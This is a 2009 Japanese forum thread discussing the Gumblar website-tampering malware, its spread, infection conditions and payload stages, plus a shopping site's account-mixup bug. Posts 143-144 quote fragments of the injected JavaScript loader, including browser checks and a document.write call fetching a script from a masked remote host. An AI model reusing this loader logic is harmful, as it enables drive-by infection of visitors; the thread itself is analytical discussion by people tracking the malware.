09/05/24 21:50:40 knIrnezr0
このスレも低レベル化してきたか…
情報提供とかする必要ないよね…こんな民度なら。
126:192.168.0.774
09/05/24 21:55:18 lzXlDT8y0
>>125
ま、本当に情報提供できる奴なら言い訳じみた愚痴よりも情報が先に出るもんだがな
127:192.168.0.774
09/05/24 22:04:44 kwJlcu/p0
わー125は高レベルでとんでもなく民度が高いんですねーすごいなー
なんで2ちゃんのスレなんかに書き込みしてるのー?
うつっちゃうよ?w
128:192.168.0.774
09/05/24 22:17:35 knIrnezr0
今までVMでの感染確認とか検体提供とかやってきたけど、うつっちゃうらしいからやめます
で、もうここにも来ませんので安心して書き込み続けてください
129:192.168.0.774
09/05/24 22:19:28 zG/5ojVF0
セキュ板帰ろうぜ
130:192.168.0.774
09/05/24 22:24:30 oOp80I+s0
>>128 皮肉を込めたつもりだろうが、ま、踏むスレで会おう
131:192.168.0.774
09/05/24 22:44:06 YgJDyVRl0
レベルと民度がうつっちゃう言われてんのに聞かないから…
132:192.168.0.774
09/05/24 22:53:05 heAsx668P
最近、沈静化して来た?
133:192.168.0.774
09/05/24 22:59:56 inQC6pkk0
>>132
ウイルスバスターが機能してないから検出すらできなくてってパターンで3件ほど身近にあったから
表に出ないだけでかなり伝播してるはず
134:192.168.0.774
09/05/24 23:04:14 aJuP8TRJ0
高レベルな人向けのスレって別にできたんじゃなかったの。
大事な情報は、そっちに上げたほうがいいと思う。
ここは、一般向けの情報で十分なのでは?
135:192.168.0.774
09/05/24 23:16:40 nMp8odr00
すっごくむかついたんだろうなあw
分かるよその気持ちw
136:192.168.0.774
09/05/25 00:53:49 kdtDbFTU0
>>132
本体配布サイトが止まってるからね。
137:192.168.0.774
09/05/25 02:34:31 Not8R34U0
>>134、やっぱ間違い。ウイルス飼って実験してるような人の情報は、
ここに上げてもらえれば、別スレの人も見てるだろうし、必要なら
誘導してくれるってことかな? そう自分が思ってるだけだけども。
138:192.168.0.774
09/05/25 02:48:16 29sMFtyK0
>>137
>>126
だから心配しなくてもいいよ
139:192.168.0.774
09/05/25 03:03:15 Not8R34U0
あっ、はい。そうだとは思いましたが、ほかにも情報提供に来る人がいて、
レス読んで帰っちゃうといけないと思って。差し出がましいことをしました。
140:192.168.0.774
09/05/25 03:52:16 g0EArU8a0
まだ出てない情報って何がある?
C&C鯖がウクライナとイギリスにあってまだ生きてる
とか使用も無い情報しか知らないんだけど
141:192.168.0.774
09/05/25 09:30:19 orpiBNMg0
最新の情報じゃないかもしれないけど感染したサイトのJSってIEじゃないとifで弾かれるよね?つまりIEじゃなきゃ感染しないよね?
142:192.168.0.774
09/05/25 09:52:49 OIu3WwGb0
あれ、chrome以外はみんな対象じゃなかったっけ
143:192.168.0.774
09/05/25 09:57:19 OIu3WwGb0
うん、やっぱりIEも火狐もOperaもSafariも感染対象
スレリンク(news4vip板:503番)
503 名前:以下、名無しにかわりましてVIPがお送りします:2009/05/18(月) 20:50:57.57 ID:PuSZbVxyP
コード展開して見てみたら、最後に読み込ませるかどうかの部分にこんな処理が
if(
(u.indexOf("Chrome")<0)//Google Chromeでなく
&&
(u.indexOf("Win")>0)//かつWindowsで
&&
(u.indexOf("NT 6")<0)//なおかつWindows 6=Vistaでなく
&&
(document.cookie.indexOf("miek=1")<0)//かつ踏んで感染したときにつけられるデータがなく(=踏むのがはじめてで)
&&
(typeof(zrvzts)!=typeof("A"))//かつリロードしてない、初めての読み込みであるとき
){
DLさせる処理
}
144:192.168.0.774
09/05/25 10:05:54 9na8SiBQ0
続きがあるんだよ
> if(window.ScriptEngine) j=j+ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion()+j;
> document.write("<script src=//****"+"**.**/vid/?id="+j+"><\/script>");
Safari/Winで踏むと、?id= のうしろが最終的にブランクになる
このGETに対して何か鯖側が準備してたかってことになるわけ
してたかもしれんし、してなかったかもしれん
145:192.168.0.774
09/05/25 10:07:49 xQ23/q8u0
1.js(>>143)
2.id=100 or id=101(ie not ie (script))
3.id=2 and id=3(pdf and flash)
4.id=10(exe)
5.URLリンク(anubis.iseclab.org)
146:192.168.0.774
09/05/25 11:25:57 l1RBWHbr0
いまさら何言ってんだか
IEでなくても普通にpdf/swf落ちてきてたから
147:192.168.0.774
09/05/25 12:18:46 zMoesA260
zlkonでは無指定でも落ちてきた
martuzでは指定パターンによって落ちてこなくなった
gunblarがどっちだったかは知らん
148:192.168.0.774
09/05/25 12:31:02 tQ4f0t5i0
>>98
そうじゃなくて、
Shockwave FlashとFlash PlayaerそれぞれにFirefoxとか用のPlugin版とIE専用のActiveX版があるの。
だから、4種類全部がインストールされている人もいるわけ。
149:192.168.0.774
09/05/25 15:08:58 L01Nn5aV0
パソコン初心者板の「初心者スレッド」っていうの開いたら
ノートン先生が怒ったんですがウィルスですか?
リンク踏んだわけじゃなくてスレ開いただけなんですが
150:192.168.0.774
09/05/25 15:10:33 /uV5OlPd0
なぜそれをここで聞く?
151:192.168.0.774
09/05/25 15:15:44 L01Nn5aV0
2ちゃんスレも危ないのかと思ったんです、すみません
152:192.168.0.774
09/05/25 15:21:34 /uV5OlPd0
じゃあここも2ちゃんだから危ないね
他のところで聞くなり調べるなりしたほうがいいよ
153:192.168.0.774
09/05/25 15:28:05 L01Nn5aV0
初心者板でなければどこで・・
ノートン誤作動で聞けばいいでしょうか
154:192.168.0.774
09/05/25 15:33:24 b26zynpUP
海外もサイトも感染してるな
155:192.168.0.774
09/05/25 15:35:05 xQ23/q8u0
海外も3月末から感染しまくってますが、どうかされましたか
156:192.168.0.774
09/05/25 15:35:17 xwO8FSQb0
そりゃ、海外から来たウイルスだからな
157:192.168.0.774
09/05/25 16:03:57 9na8SiBQ0
スレ違いにあたるのでヒントだけ
2ちゃんねる ノートン でぐぐる。対策はなにげに面倒だったりするが、まずはなにごとか知ること
158:192.168.0.774
09/05/25 16:44:23 g0EArU8a0
SafariなんぞWin98と同じで眼中に無かっただけだろ
159:192.168.0.774
09/05/25 17:29:01 kdtDbFTU0
ノートントラップのことは初心者スレで聞けよ
160:192.168.0.774
09/05/25 17:38:15 YvB3PQLE0
リストって情報古いまま?
pixivが一部感染になってるけどこれは…
161:192.168.0.774
09/05/25 17:55:54 d34ru99R0
あのリストとチェックサイトの件は無かったことにしたほうがいいよ
今となってはかえって混乱を増幅してる
162:192.168.0.774
09/05/25 19:48:26 d84pSB9l0
>>160
pixiv のプロフィールページで自分のHPやブログにリンクを貼ってる人がある程度いる。
そのなかで感染してるページがあったという噂に基づく....らしい。
163:192.168.0.774
09/05/25 21:41:49 JhdhMmYC0
GENOの所が、またやらかしたらしい・・・
378 名前:Socket774 投稿日:2009/05/25(月) 14:40:04 ID:Xd8gaLc7
GENOでポイント照会すると、他人のIDが出て来ちゃう(>_<)
380 名前:Socket774 投稿日:2009/05/25(月) 15:15:22 ID:b7/1msFI
>>378は、他人のID使ったなりすまし犯罪者ですね、わかります。
381 名前:378 投稿日:2009/05/25(月) 15:25:46 ID:Xd8gaLc7
>>380
なりすましじゃないよ。
注文照会したら、「注文された商品はありません」ってなってたから、
おかしいって思って、ポイント照会したら、他人のIDがでてきた。
で、会員情報の修正って所をクリックしたら…。
382 名前:Socket774 投稿日:2009/05/25(月) 15:33:03 ID:b7/1msFI
ほんとだ。ログインし直しても、他人の名前とIDとポイント獲得歴が出てしまい、
自分の情報が閲覧できないぞ。
383 名前:378 投稿日:2009/05/25(月) 15:34:19 ID:Xd8gaLc7
>>382
だろ。
自分の個人情報も変えれねーwww
164:192.168.0.774
09/05/25 21:54:51 +y9+ZUOu0
さすがGENOさん!俺たちに(以下ry
つか、こんな騒動があっても利用する奴が居る事に驚いた。
165:192.168.0.774
09/05/25 22:08:06 jKyVT4Df0
7つのNOだな
166:192.168.0.774
09/05/25 22:14:53 2+gm0oNq0
何やってんだGENOは・・・
167:192.168.0.774
09/05/25 22:31:48 73AdRoBk0
オレも他人のIDで出たぞ
アカ削除することもできねぇ
168:192.168.0.774
09/05/25 22:39:30 ju8jdLa20
別種のウィルスに感染してたりしてな
ログインした人も軒並み感染とか・・・
だとしたら新GENOウィルスって名前になるのかなw
169:192.168.0.774
09/05/25 22:47:26 1LBKGrg40
他人のIDとごっちゃとか半端ねぇww
170:192.168.0.774
09/05/25 22:50:18 c0a0QXT00
GENO第二章の始まりか?
それにしても他人の名前やらIDやらが出るってひでーな
171:192.168.0.774
09/05/25 22:57:50 R7WqhNJI0
これが別のウイルスのせいだったらGENOウイルスIIとかハイパーGENOウイルスとか
そんな名前にするの?
172:192.168.0.774
09/05/25 23:00:27 2XNmNZPd0
今回の問題に関するGENOの回答も期待できるのかなw
管理者がバカやらかした可能性もまたウイルスな可能性もあそこならありえる
173:192.168.0.774
09/05/25 23:03:51 /SYvB9LI0
改ざんサイトをGoogleで簡単に発見可能なことが判ったのでメモ。
1. 任意のドメインをGoogleのセーフ ブラウジングで検索する。
例えば「google.com」なら、URLリンク(safebrowsing.clients.google.com)
をブラウザで開く。
2. 表示された「Google セーフ ブラウジング診断ページ」で、
「This site was hosted on xx network(s) including」の後にあるリンク(上の場合、「AS15169 (GOOGLE)」)をクリック。
3. そのネットワーク内でホスティングされている改ざんサイトのURLが挙げられるので、リンクをクリック。
4. 「不正なソフトウェアは gumblar.cn/ を含む 1 個のドメインでホストされています。」といった文章があれば、gumblarスクリプトに改ざんされた可能性あり。
174:192.168.0.774
09/05/25 23:04:38 /SYvB9LI0
これをドメイン名を変えて総当たりでひたすら続けると、ぞろぞろ出てきます。
ちなみに検索するドメイン名は、「google.com」と「www.google.com」とでは検索結果が違うので注意。
「www.」なしで検索して「疑わしくない」という結果が出ても、「www.」などを付けると「疑わしいサイト」になったりします。
175:192.168.0.774
09/05/26 03:39:47 adE8bcIF0
>>174
お前にパソコン通信は無理
176:192.168.0.774
09/05/26 03:46:27 /VVIOLJQ0
パソコン通信ワロタww
177:192.168.0.774
09/05/26 04:22:39 opExhozI0
パソ通の時代なんて知らんけどまずはニフティマネージャを(ry
178:192.168.0.774
09/05/26 04:29:44 0NS4XGEC0
新しいウィルスだったらNEOGEOウィルスで
179:192.168.0.774
09/05/26 04:30:08 /ktv3JuM0
このウイルスって感染すると専ブラの調子もおかしくなるのかな…
180:192.168.0.774
09/05/26 04:45:10 mifzxisU0
>>179
よほどのマシンパワーがないと全てがまともに動かん
181:192.168.0.774
09/05/26 04:48:59 mifzxisU0
とか言ったけど上はVM上の話な
普通気がつくレベルと思うけど
182:192.168.0.774
09/05/26 04:53:06 /ktv3JuM0
そっか…ありがとう
chmファイルは異常ないみたいなんだけども
何故かいくつかのスレが表示がおかしくなるんだけどそっちは別の原因があるのか
183:192.168.0.774
09/05/26 08:57:00 xUEn5PcS0
>>182
別件や別ウイルスでレジストリ狂ってんじゃね?
クリーンインスコやろうぜクリーンインスコ
慣れたら快感になるからやろうぜ
184:192.168.0.774
09/05/26 09:40:42 NRkVzeKAO
>>183は踏みすぎwww
185:192.168.0.774
09/05/26 10:50:49 ti9+LTirO
快感になるワロタ
だが分からんでもない
186:192.168.0.774
09/05/26 11:32:19 Z2FeIoNLP
WindowsもLinuxみたいにバッチファイルひとつで、
クリーンインストール後の設定とアプリインストールとアップデートがワンタッチでできればいいのにね。
ドライバ、アップデート、必要なアプリインストールとか環境整えるのが面倒すぎる。
187:192.168.0.774
09/05/26 11:57:33 Au+8+Nsd0
Windows 7でそういう機能を搭載するのかと思ったけど違うみたいだしね
次ページ最新レス表示スレッドの検索類似スレ一覧話題のニュースおまかせリスト▼オプションを表示暇つぶし2ch
5342日前に更新/138 KB
担当:undef